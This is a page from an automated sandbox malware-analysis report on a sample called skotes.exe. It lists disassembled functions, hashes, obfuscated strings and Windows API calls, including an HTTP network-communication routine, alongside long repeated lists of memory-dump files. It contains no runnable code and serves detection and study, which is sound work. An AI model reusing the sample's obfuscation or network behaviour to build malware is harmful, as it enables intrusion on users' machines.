Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vC
API String ID: 3213747228-1921080006
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68

Function 0041BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0041BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0041BBE4
_xtime_get.LIBCPMT ref: 0041BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0041BC13

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
Instruction ID: 8ea58e001adf984e7c012f60bfadf62abbd4b5fd5d949d96f5012e2c2c88c0a4
Opcode Fuzzy Hash: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
Instruction Fuzzy Hash: 08216275A00219AFDF00EFA5CC819FEB7B9EF08714F10006AF601B7291DB389D419BA5

Function 0043F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043F3A3

Strings

8"F, xrefs: 0043F44B
`'F, xrefs: 0043F375

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"F$`'F
API String ID: 3903695350-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19

Analysis Process: skotes.exePID: 7856, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	408
Total number of Limit Nodes:	32

Executed Functions

Function 0040E530 Relevance: 25.5, APIs: 2, Strings: 12, Instructions: 998
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

111, xrefs: 0040F7A0
WTs=, xrefs: 004105CA
MQ==, xrefs: 0040E592
#, xrefs: 00410624
MGE+, xrefs: 0040E821
9c9aa5, xrefs: 0040FB8E
WTw=, xrefs: 0041097D
L1F, xrefs: 0040F7E5
WDw=, xrefs: 0040F71D, 0040F9FA
GnNoc2Hc, xrefs: 0040E56C
246122658369, xrefs: 0040F737, 0040FA14, 004105E7, 0041099A
UA==, xrefs: 0040EB0F, 0040ED56

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1F$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
API String ID: 0-2926265604
Opcode ID: 8020ee510c47500d59f8a028e20012f2248e9dac3caff229878ad4c6df471119
Instruction ID: c00d5da7f38c2449fb8cd598710738c568041c1ddbaa364cf2670df7d4207dbf
Opcode Fuzzy Hash: 8020ee510c47500d59f8a028e20012f2248e9dac3caff229878ad4c6df471119
Instruction Fuzzy Hash: C782D6709042889BEF14EF68C9497DE7FB1AF46308F50859EE805273C2D7795A88CBD6

Function 0040EB4E Relevance: 31.9, APIs: 3, Strings: 14, Instructions: 2131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040EB51
CreateDirectoryA.KERNEL32(00000000), ref: 0040EC83
GetFileAttributesA.KERNEL32(00000000), ref: 0040ED98

Strings

WTs=, xrefs: 004105CA
FisgLnsCZO1i, xrefs: 0040FF19
invalid stoi argument, xrefs: 004108B0
L1F, xrefs: 0040F7E5
WDw=, xrefs: 0040F71D, 0040F9FA, 0040FDE3
GiQaT29tduF=, xrefs: 0040FEB6
stoi argument out of range, xrefs: 004108C4
mxo1L0x, xrefs: 0040EE84
111, xrefs: 0040F7A0
#, xrefs: 00410624
9c9aa5, xrefs: 0040FB8E
246122658369, xrefs: 0040F737, 0040FA14, 0040FE00, 004105E7
UA==, xrefs: 0040EC41, 0040ED56, 0040EF89, 0040F2CE
FCQgKF==, xrefs: 0040FEE4

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesFile$CreateDirectory
String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1F$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
API String ID: 1875963930-1066624543
Opcode ID: f26621359c44b5415cdd31966c1168155b8c61a490e8ef7e49c4fdd238aaa700
Instruction ID: 2362697156585c439b00c7fcd7db2baabb354546f2fecbbecffb7eeac3b234dd
Opcode Fuzzy Hash: f26621359c44b5415cdd31966c1168155b8c61a490e8ef7e49c4fdd238aaa700
Instruction Fuzzy Hash: 81F25E71A001449BEF18DB38CD897DD7B729F82304F1481AEE409A73D6DB7D9AC48B99

Function 0040BE30 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,F89C42A9,?,00000000), ref: 0040BEB8
InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEC
HttpOpenRequestA.WININET(?,00000000), ref: 0040BF35
HttpSendRequestA.WININET(?,00000000), ref: 0040BFF6
InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C0A8
InternetCloseHandle.WININET(?), ref: 0040C187
InternetCloseHandle.WININET(?), ref: 0040C18F
InternetCloseHandle.WININET(?), ref: 0040C197

Strings

invalid stoi argument, xrefs: 0040E4F4
8HJUeMD Lq5=, xrefs: 0040C465
RE1NXF==, xrefs: 0040BF0E
8HJUeIfzLo==, xrefs: 0040C3CB, 0040C623
stoi argument out of range, xrefs: 0040E4EA

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
